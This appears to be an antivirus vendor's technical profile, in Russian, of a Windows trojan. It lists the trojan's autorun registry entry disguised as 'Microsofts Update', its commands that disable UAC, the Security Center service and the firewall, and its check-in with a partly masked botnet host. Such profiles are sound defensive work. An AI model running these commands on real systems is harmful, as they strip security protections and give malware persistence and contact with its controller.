Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsofts Update' = '%WINDIR%\csrssr.exe'
- Средство контроля пользовательских учетных записей (UAC)
- '<SYSTEM32>\net1.exe' stop "Security Center"
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' stop SharedAccess
- '<SYSTEM32>\net1.exe' stop "Centro de Seguridad"
- '<SYSTEM32>\net.exe' stop "Security Center"
- '<SYSTEM32>\netsh.exe' firewall set opmode mode = DISABLE
- '<SYSTEM32>\net.exe' stop SharedAccess
- '<SYSTEM32>\net.exe' stop "Centro de Seguridad"
- %WINDIR%\csrssr.exe
- 'hy###whms.co.cc':80
- hy###whms.co.cc/priv8/bots.php?na###################
- DNS ASK hy###whms.co.cc